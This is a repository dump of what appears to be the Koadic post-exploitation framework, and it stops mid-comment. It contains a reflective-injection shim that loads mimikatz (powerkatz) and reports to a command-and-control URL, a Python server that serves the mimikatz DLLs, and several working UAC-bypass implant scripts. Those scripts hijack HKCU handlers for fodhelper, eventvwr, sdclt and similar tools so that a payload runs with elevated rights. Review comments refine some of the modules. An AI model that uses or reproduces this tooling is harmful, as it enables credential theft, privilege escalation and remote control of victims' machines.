x86) 20 | 2. If WOW64, create an x64 process and inject the x64 version of itself into it (aforementioned sorcery) 21 | 3. If x64, reflectively load powerkatz.dll and call it. 22 | 4. DllMain's lpParam contains strings of UUIDs, the mimikatz command to run, and the C&C callhome URL. 23 | 24 | There is also network code built-in so it can report back to the C&C server.
25 | 26 | ### Build Notes 27 | 28 | - Build x64 version first 29 | - Get pre-calculated offset via inject.x64.exe 30 | - Insert x64 offset into koadic_process.c 31 | - Build x86 32 | - Get pre-calculated offset via inject.exe 33 | - Insert x86 offset into mimikatz_dynwrapx.py 34 | -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/.gitignore: -------------------------------------------------------------------------------- 1 | Release/ 2 | Debug/ 3 | x64/ 4 | dll/Release/ 5 | dll/Debug/ 6 | dll/reflective_dll.vcproj.*.user 7 | dll/reflective_dll.vcxproj.user 8 | inject/Release/ 9 | inject/Debug/ 10 | inject/inject.vcproj.*.user 11 | inject/inject.vcxproj.user 12 | rdi.ncb 13 | rdi.suo 14 | rdi.sdf 15 | rdi.opensdf 16 | rdi.v11.suo -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/LICENSE.txt: -------------------------------------------------------------------------------- 1 | Copyright (c) 2011, Stephen Fewer of Harmony Security (www.harmonysecurity.com) 2 | All rights reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without modification, are permitted 5 | provided that the following conditions are met: 6 | 7 | * Redistributions of source code must retain the above copyright notice, this list of 8 | conditions and the following disclaimer. 9 | 10 | * Redistributions in binary form must reproduce the above copyright notice, this list of 11 | conditions and the following disclaimer in the documentation and/or other materials provided 12 | with the distribution. 13 | 14 | * Neither the name of Harmony Security nor the names of its contributors may be used to 15 | endorse or promote products derived from this software without specific prior written permission. 
16 | 17 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 18 | IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND 19 | FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 20 | CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 21 | CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 22 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 23 | THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 24 | OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 25 | POSSIBILITY OF SUCH DAMAGE. -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/dll/koadic_load.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #ifndef WIN32_LEAN_AND_MEAN 4 | #define WIN32_LEAN_AND_MEAN 5 | #endif 6 | #include 7 | 8 | HMODULE WINAPI powerkatz_reflective_load(LPVOID lpPowerkatz, LPVOID lpParameter); 9 | wchar_t * WINAPI powerkatz_invoke(HMODULE hPowerKatz, LPCWSTR input); -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/dll/koadic_net.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #ifndef WIN32_LEAN_AND_MEAN 4 | #define WIN32_LEAN_AND_MEAN 5 | #endif 6 | #include 7 | #include 8 | #include 9 | 10 | #pragma comment(lib, "Wininet.lib") 11 | 12 | #include "koadic_types.h" 13 | 14 | BOOL koadic_http_request(LPCSTR host, WORD port, BOOL secure, LPCSTR verb, LPCSTR path, LPCSTR szHeaders, SIZE_T nHeaderSize, 15 | LPCSTR postData, SIZE_T nPostDataSize, char **data, LPDWORD dwDataSize); 16 | 17 | BOOL 
koadic_http_get_x64_shim(koadic_shim_parsed *parsed, char **data, LPDWORD dwSize); 18 | BOOL koadic_http_get_powerkatz(koadic_shim_parsed *parsed, char **data, LPDWORD dwSize); 19 | 20 | BOOL koadic_http_report_work(koadic_shim_parsed *parsed, char *work); 21 | BOOL koadic_http_report_error(koadic_shim_parsed *parsed, char *work); -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/dll/koadic_process.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | #include "koadic_types.h" 6 | 7 | #define MIMISHIM_X64_OFFSET 7620 8 | 9 | 10 | BOOL koadic_create_sysnative_process(LPCSTR program, LPDWORD dwPID); 11 | BOOL koadic_fork_x64(koadic_shim_parsed *parsed, LPWSTR lpParam, char *data, DWORD dwDataSize); 12 | -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/dll/koadic_types.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | // strcpy 4 life-- it was a buffalo overflow, in the heart of the shellcode 6 | #if (_MSC_VER >= 1400) // Check MSC version 7 | #pragma warning(disable: 4996) // Disable deprecation 8 | #endif 9 | 10 | #pragma pack(push, 1) 11 | 12 | typedef struct _koadic_shim_parsed { 13 | CHAR host[512]; 14 | CHAR path[512]; 15 | WORD port; 16 | BOOL secure; 17 | CHAR uuidHeader[100]; 18 | CHAR uuidMimix86[40]; 19 | CHAR uuidMimix64[40]; 20 | CHAR uuidShimx64[40]; 21 | CHAR mimicmd[100]; // 'twas a buffalo overflow 22 | } koadic_shim_parsed; 23 | 24 | #pragma pack(pop) -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/dll/koadic_util.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | #include "koadic_types.h" 6 | 7 | BOOL 
koadic_get_debug_priv(); 8 | BOOL koadic_cpu_matches_process(); 9 | 10 | // proposed buffalo format: 11 | // UUIDHEADER~~UUIDSHIMX64~~UUIDMIMIKATZX86~~UUIDMIMIKATZ64~~WORKURL 12 | BOOL koadic_parse_shim(LPWSTR buffalo, koadic_shim_parsed *parsed); -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/dll/mimishim.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | 14 | 15 | Source Files 16 | 17 | 18 | Source Files 19 | 20 | 21 | 22 | 23 | Header Files 24 | 25 | 26 | Header Files 27 | 28 | 29 | -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/dll/mimishim.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 10.00 3 | # Visual C++ Express 2008 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "mimishim", "mimishim.vcproj", "{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}" 5 | EndProject 6 | Global 7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 8 | Debug|Win32 = Debug|Win32 9 | Release|Win32 = Release|Win32 10 | EndGlobalSection 11 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 12 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.ActiveCfg = Release|Win32 13 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.Build.0 = Release|Win32 14 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.ActiveCfg = Release|Win32 15 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.Build.0 = Release|Win32 16 | EndGlobalSection 17 | GlobalSection(SolutionProperties) = preSolution 18 | HideSolutionNode = FALSE 19 | EndGlobalSection 20 | EndGlobal 21 | 
-------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/inject/inject.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 10.00 3 | # Visual C++ Express 2008 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "inject", "inject.vcproj", "{EEF3FD41-05D8-4A07-8434-EF5D34D76335}" 5 | EndProject 6 | Global 7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 8 | Debug|Win32 = Debug|Win32 9 | Release|Win32 = Release|Win32 10 | EndGlobalSection 11 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 12 | {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|Win32.ActiveCfg = Release|Win32 13 | {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|Win32.Build.0 = Release|Win32 14 | {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|Win32.ActiveCfg = Release|Win32 15 | {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|Win32.Build.0 = Release|Win32 16 | EndGlobalSection 17 | GlobalSection(SolutionProperties) = preSolution 18 | HideSolutionNode = FALSE 19 | EndGlobalSection 20 | EndGlobal 21 | -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/inject/inject.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | 14 | 15 | Source Files 16 | 17 | 18 | Source Files 19 | 20 | 21 | Source Files 22 | 23 | 24 | 25 | 26 | Header Files 27 | 28 | 29 | Header Files 30 | 31 | 32 | Header Files 33 | 34 | 35 | -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/inject/src/GetProcAddressR.h: 
-------------------------------------------------------------------------------- 1 | //===============================================================================================// 2 | // Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) 3 | // All rights reserved. 4 | // 5 | // Redistribution and use in source and binary forms, with or without modification, are permitted 6 | // provided that the following conditions are met: 7 | // 8 | // * Redistributions of source code must retain the above copyright notice, this list of 9 | // conditions and the following disclaimer. 10 | // 11 | // * Redistributions in binary form must reproduce the above copyright notice, this list of 12 | // conditions and the following disclaimer in the documentation and/or other materials provided 13 | // with the distribution. 14 | // 15 | // * Neither the name of Harmony Security nor the names of its contributors may be used to 16 | // endorse or promote products derived from this software without specific prior written permission. 17 | // 18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND 20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 26 | // POSSIBILITY OF SUCH DAMAGE. 
27 | //===============================================================================================// 28 | #ifndef _REFLECTIVEDLLINJECTION_GETPROCADDRESSR_H 29 | #define _REFLECTIVEDLLINJECTION_GETPROCADDRESSR_H 30 | //===============================================================================================// 31 | #include "ReflectiveDLLInjection.h" 32 | 33 | FARPROC WINAPI GetProcAddressR( HANDLE hModule, LPCSTR lpProcName ); 34 | //===============================================================================================// 35 | #endif 36 | //===============================================================================================// 37 | -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/inject/src/LoadLibraryR.h: -------------------------------------------------------------------------------- 1 | //===============================================================================================// 2 | // Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) 3 | // All rights reserved. 4 | // 5 | // Redistribution and use in source and binary forms, with or without modification, are permitted 6 | // provided that the following conditions are met: 7 | // 8 | // * Redistributions of source code must retain the above copyright notice, this list of 9 | // conditions and the following disclaimer. 10 | // 11 | // * Redistributions in binary form must reproduce the above copyright notice, this list of 12 | // conditions and the following disclaimer in the documentation and/or other materials provided 13 | // with the distribution. 14 | // 15 | // * Neither the name of Harmony Security nor the names of its contributors may be used to 16 | // endorse or promote products derived from this software without specific prior written permission. 
17 | // 18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND 20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 26 | // POSSIBILITY OF SUCH DAMAGE. 27 | //===============================================================================================// 28 | #ifndef _REFLECTIVEDLLINJECTION_LOADLIBRARYR_H 29 | #define _REFLECTIVEDLLINJECTION_LOADLIBRARYR_H 30 | //===============================================================================================// 31 | #include "ReflectiveDLLInjection.h" 32 | 33 | DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer ); 34 | 35 | HMODULE WINAPI LoadLibraryR( LPVOID lpBuffer, DWORD dwLength ); 36 | 37 | HANDLE WINAPI LoadRemoteLibraryR( HANDLE hProcess, LPVOID lpBuffer, DWORD dwLength, LPVOID lpParameter ); 38 | 39 | //===============================================================================================// 40 | #endif 41 | //===============================================================================================// 42 | -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/rdi.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Express 
2012 for Windows Desktop 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "inject", "inject\inject.vcxproj", "{EEF3FD41-05D8-4A07-8434-EF5D34D76335}" 5 | EndProject 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "mimishim", "dll\mimishim.vcxproj", "{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|ARM = Debug|ARM 11 | Debug|Win32 = Debug|Win32 12 | Debug|x64 = Debug|x64 13 | Release|ARM = Release|ARM 14 | Release|Win32 = Release|Win32 15 | Release|x64 = Release|x64 16 | EndGlobalSection 17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 18 | {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|ARM.ActiveCfg = Release|ARM 19 | {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|ARM.Build.0 = Release|ARM 20 | {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|Win32.ActiveCfg = Release|Win32 21 | {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|Win32.Build.0 = Release|Win32 22 | {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|x64.ActiveCfg = Release|x64 23 | {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|x64.Build.0 = Release|x64 24 | {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|ARM.ActiveCfg = Release|ARM 25 | {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|ARM.Build.0 = Release|ARM 26 | {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|Win32.ActiveCfg = Release|Win32 27 | {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|Win32.Build.0 = Release|Win32 28 | {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|x64.ActiveCfg = Release|x64 29 | {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|x64.Build.0 = Release|x64 30 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|ARM.ActiveCfg = Release|ARM 31 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|ARM.Build.0 = Release|ARM 32 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.ActiveCfg = Release|Win32 33 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.Build.0 = Release|Win32 34 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|x64.ActiveCfg = 
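Release|x64
		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|x64.Build.0 = Release|x64
		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|ARM.ActiveCfg = Release|ARM
		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|ARM.Build.0 = Release|ARM
		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.ActiveCfg = Release|Win32
		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.Build.0 = Release|Win32
		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|x64.ActiveCfg = Release|x64
		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|x64.Build.0 = Release|x64
	EndGlobalSection
	GlobalSection(SolutionProperties) = preSolution
		HideSolutionNode = FALSE
	EndGlobalSection
EndGlobal
--------------------------------------------------------------------------------
/data/bin/mimishim/server.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
"""Tiny HTTP server that hands the mimikatz DLLs / x64 shim to a test client.

POST with header ``UUIDHEADA`` set to ``mimidllx32``, ``mimidllx64`` or
``mimishimx64`` returns the matching binary; GET is a liveness check.

SECURITY: there is no authentication or transport protection at all.  Anyone
who can reach the listening port can download the tooling, so run this only on
a lab/loopback interface or behind a firewall, and stop it when done.
"""

from http.server import BaseHTTPRequestHandler, HTTPServer
from emu.powerkatz32 import x32
from emu.powerkatz64 import x64
import base64
import os

# Request header the client uses to say which binary it wants.
PAYLOAD_HEADER = 'UUIDHEADA'

# mimishimx64.dll is served from the directory this script lives in rather
# than from whatever the current working directory happens to be.
_HERE = os.path.dirname(os.path.abspath(__file__))


# HTTPRequestHandler class
class testHTTPServer_RequestHandler(BaseHTTPRequestHandler):
    """Serve the payload selected by the UUIDHEADA header (see module doc)."""

    @staticmethod
    def payload_for(tag):
        """Return the bytes to serve for header value *tag*, or ``None``.

        ``mimidllx32`` / ``mimidllx64`` decode the base64 blobs from the
        ``emu`` package; ``mimishimx64`` reads ``mimishimx64.dll`` next to this
        script (raises ``OSError`` if it is missing).  Any other value,
        including a missing header, yields ``None``.
        """
        if tag == 'mimidllx32':
            return base64.b64decode(x32)
        if tag == 'mimidllx64':
            return base64.b64decode(x64)
        if tag == 'mimishimx64':
            with open(os.path.join(_HERE, "mimishimx64.dll"), 'rb') as f:
                return f.read()
        return None

    # GET
    def do_GET(self):
        """Liveness check: a fixed greeting followed by the request line."""
        self.send_response(200)
        # text/plain, not text/html: the request line is client-controlled and
        # must not be rendered as markup by a browser.
        self.send_header('Content-type', 'text/plain')
        self.end_headers()
        self.wfile.write("Hello world!".encode("utf8"))
        self.wfile.write(self.requestline.encode("utf8"))

    def do_POST(self):
        """Send the requested binary, or 404 when the header is unknown/missing.

        The payload is resolved *before* the status line goes out, so a
        missing DLL file produces an error instead of a 200 with a truncated
        body (the original sent the headers first and then failed).
        """
        payload = self.payload_for(self.headers.get(PAYLOAD_HEADER))
        if payload is None:
            self.send_error(404, "unknown payload")
            return
        self.send_response(200)
        # was 'octet/stream', which is not a registered media type
        self.send_header('Content-type', 'application/octet-stream')
        self.send_header('Content-Length', str(len(payload)))
        self.end_headers()
        self.wfile.write(payload)


def run(host='0.0.0.0', port=8081):
    """Start serving on *host*:*port* until interrupted.

    The default binds every interface (8081 needs no root, unlike port 80);
    pass ``host='127.0.0.1'`` unless the client really is on another machine.
    """
    print('starting server...')
    httpd = HTTPServer((host, port), testHTTPServer_RequestHandler)
    print('running server...')
    httpd.serve_forever()


if __name__ == '__main__':
    run()
--------------------------------------------------------------------------------
/data/bin/powerkatz32.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/offsecginger/koadic/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/bin/powerkatz32.dll
--------------------------------------------------------------------------------
/data/bin/powerkatz64.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/offsecginger/koadic/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/bin/powerkatz64.dll
--------------------------------------------------------------------------------
/data/bin/shellcode_dotnet2js.dll:
--------------------------------------------------------------------------------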
https://raw.githubusercontent.com/offsecginger/koadic/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/bin/shellcode_dotnet2js.dll -------------------------------------------------------------------------------- /data/implant/elevate/bypassuac_compdefaults.js: -------------------------------------------------------------------------------- 1 | try 2 | { 3 | // not sure if this is needed, but it can't hurt, right? 4 | var consentpath = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"; 5 | var consentval = Koadic.registry.read(Koadic.registry.HKLM, consentpath, "ConsentPromptBehaviorAdmin", Koadic.registry.DWORD).uValue; 6 | if (consentval == 2) 7 | { 8 | var e = Error('Consent value is too high!'); 9 | throw e; 10 | } 11 | 12 | var path = 'Software\\Classes\\ms-settings\\shell\\open\\command'; 13 | Koadic.registry.write(Koadic.registry.HKCU, path, 'DelegateExecute', '', Koadic.registry.STRING); 14 | Koadic.registry.write(Koadic.registry.HKCU, path, '', '~PAYLOAD_DATA~', Koadic.registry.STRING); 15 | 16 | Koadic.shell.run("ComputerDefaults.exe", true); 17 | 18 | Koadic.work.report("Completed"); 19 | 20 | var now = new Date().getTime(); 21 | while (new Date().getTime() < now + 10000); 22 | 23 | if (Koadic.registry.destroy(Koadic.registry.HKCU, path, "") != 0) 24 | { 25 | Koadic.shell.run("reg delete HKCU\\"+path+" /f", true); 26 | } 27 | } 28 | catch (e) 29 | { 30 | Koadic.work.error(e); 31 | } 32 | 33 | Koadic.exit(); 34 | -------------------------------------------------------------------------------- /data/implant/elevate/bypassuac_compmgmtlauncher.js: -------------------------------------------------------------------------------- 1 | try 2 | { 3 | // not sure if this is needed, but it can't hurt, right? 
4 | var consentpath = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"; 5 | var consentval = Koadic.registry.read(Koadic.registry.HKLM, consentpath, "ConsentPromptBehaviorAdmin", Koadic.registry.DWORD).uValue; 6 | if (consentval == 2) 7 | { 8 | var e = Error('Consent value is too high!'); 9 | throw e; 10 | } 11 | 12 | var path = 'Software\\Classes\\mscfile\\shell\\open\\command'; 13 | Koadic.registry.write(Koadic.registry.HKCU, path, '', '~PAYLOAD_DATA~', Koadic.registry.STRING); 14 | 15 | Koadic.shell.run("CompMgmtLauncher.exe", true); 16 | 17 | Koadic.work.report("Completed"); 18 | 19 | var now = new Date().getTime(); 20 | while (new Date().getTime() < now + 10000); 21 | 22 | if (Koadic.registry.destroy(Koadic.registry.HKCU, path, "") != 0) 23 | { 24 | Koadic.shell.run("reg delete HKCU\\"+path+" /f", true); 25 | } 26 | } 27 | catch (e) 28 | { 29 | Koadic.work.error(e); 30 | } 31 | 32 | Koadic.exit(); 33 | -------------------------------------------------------------------------------- /data/implant/elevate/bypassuac_eventvwr.js: -------------------------------------------------------------------------------- 1 | try 2 | { 3 | var consentpath = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"; 4 | var consentval = Koadic.registry.read(Koadic.registry.HKLM, consentpath, "ConsentPromptBehaviorAdmin", Koadic.registry.DWORD).uValue; 5 | if (consentval == 2) 6 | { 7 | var e = Error('Consent value is too high!'); 8 | throw e; 9 | } 10 | var path = "Software\\Classes\\mscfile\\shell\\open\\command"; 11 | 12 | Koadic.registry.write(Koadic.registry.HKCU, path, "", "~PAYLOAD_DATA~", Koadic.registry.STRING); 13 | 14 | Koadic.shell.run("eventvwr.exe", true); 15 | 16 | Koadic.work.report("Completed"); 17 | 18 | var now = new Date().getTime(); 19 | while (new Date().getTime() < now + 10000); 20 | 21 | if (Koadic.registry.destroy(Koadic.registry.HKCU, path, "") != 0) 22 | { 23 | Koadic.shell.run("reg delete HKCU\\"+path+" /f", true); 24 | } 25 | } 
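catch (e)
{
    Koadic.work.error(e);
}

Koadic.exit();
--------------------------------------------------------------------------------
/data/implant/elevate/bypassuac_eventvwr.vbs:
--------------------------------------------------------------------------------
' VBScript variant of bypassuac_eventvwr.js: put the payload into this user's
' mscfile open handler, launch eventvwr.exe, wait, then remove the handler.
' NOTE(review): unlike the .js sibling there is no ConsentPromptBehaviorAdmin
' check here, so it will run (and fail noisily) on "always prompt" hosts.
sub BypassUACEventVwr
    Const HKEY_CURRENT_USER = &H80000001
    strKeyPath = "Software\Classes\mscfile\shell\open\command"

    Set objRegistry = GetObject("winmgmts:\\.\root\default:StdRegProv")
    objRegistry.CreateKey HKEY_CURRENT_USER, strKeyPath

    objRegistry.SetStringValue HKEY_CURRENT_USER, strKeyPath, "", "~PAYLOAD_DATA~"

    KoRunCmd "eventvwr.exe", true
    KoSleep 10

    ' Cleanup the .js module performs and this version was missing: without it
    ' the hijack stays in HKCU and every .msc this user opens keeps running the
    ' payload.  Only the leaf "command" key is removed, matching the .js module.
    objRegistry.DeleteKey HKEY_CURRENT_USER, strKeyPath
end sub

BypassUACEventVwr

KoReportWork "Completed"

KoExit
--------------------------------------------------------------------------------
/data/implant/elevate/bypassuac_fodhelper.js:
--------------------------------------------------------------------------------
try
{
    // not sure if this is needed, but it can't hurt, right? 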
4 | var consentpath = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"; 5 | var consentval = Koadic.registry.read(Koadic.registry.HKLM, consentpath, "ConsentPromptBehaviorAdmin", Koadic.registry.DWORD).uValue; 6 | if (consentval == 2) 7 | { 8 | var e = Error('Consent value is too high!'); 9 | throw e; 10 | } 11 | 12 | var path = 'Software\\Classes\\ms-settings\\shell\\open\\command'; 13 | Koadic.registry.write(Koadic.registry.HKCU, path, 'DelegateExecute', '', Koadic.registry.STRING); 14 | Koadic.registry.write(Koadic.registry.HKCU, path, '', '~PAYLOAD_DATA~', Koadic.registry.STRING); 15 | 16 | Koadic.shell.run("fodhelper.exe", true); 17 | 18 | Koadic.work.report("Completed"); 19 | 20 | var now = new Date().getTime(); 21 | while (new Date().getTime() < now + 10000); 22 | 23 | if (Koadic.registry.destroy(Koadic.registry.HKCU, path, "") != 0) 24 | { 25 | Koadic.shell.run("reg delete HKCU\\"+path+" /f", true); 26 | } 27 | } 28 | catch (e) 29 | { 30 | Koadic.work.error(e); 31 | } 32 | 33 | Koadic.exit(); 34 | -------------------------------------------------------------------------------- /data/implant/elevate/bypassuac_sdclt.js: -------------------------------------------------------------------------------- 1 | try 2 | { 3 | var consentpath = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"; 4 | var consentval = Koadic.registry.read(Koadic.registry.HKLM, consentpath, "ConsentPromptBehaviorAdmin", Koadic.registry.DWORD).uValue; 5 | if (consentval == 2) 6 | { 7 | var e = Error('Consent value is too high!'); 8 | throw e; 9 | } 10 | var path = "Software\\Classes\\exefile\\shell\\runas\\command"; 11 | 12 | var cmd = Koadic.file.getPath("%COMSPEC%"); 13 | Koadic.registry.write(Koadic.registry.HKCU, path, "IsolatedCommand", cmd + " /c ~PAYLOAD_DATA~", Koadic.registry.STRING); 14 | 15 | Koadic.shell.run("sdclt.exe /kickoffelev", true); 16 | 17 | Koadic.work.report("Completed"); 18 | 19 | var now = new Date().getTime(); 20 | while (new 
Date().getTime() < now + 10000);

    if (Koadic.registry.destroy(Koadic.registry.HKCU, path, "IsolatedCommand") != 0)
    {
        Koadic.shell.run("reg delete HKCU\\"+path+" /v IsolatedCommand /f", true);
    }
}
catch (e)
{
    Koadic.work.error(e);
}

Koadic.exit();
--------------------------------------------------------------------------------
/data/implant/elevate/bypassuac_slui.js:
--------------------------------------------------------------------------------
// NOTE(review): this module is named "slui" and hijacks
// HKCU\Software\Classes\exefile\shell\open\command (presumably the key the
// slui.exe technique relies on), but the binary launched below is
// fodhelper.exe -- the sibling bypassuac_fodhelper.js triggers fodhelper via
// the ms-settings key, not exefile.  Confirm which target was intended; as
// written the registry half and the launch half do not match.
// NOTE(review): exefile is the handler for every .exe, not just the target.
// During the 10 s wait below -- and permanently if the delete fails -- any
// program this user starts runs ~PAYLOAD_DATA~ instead.  Keep the window
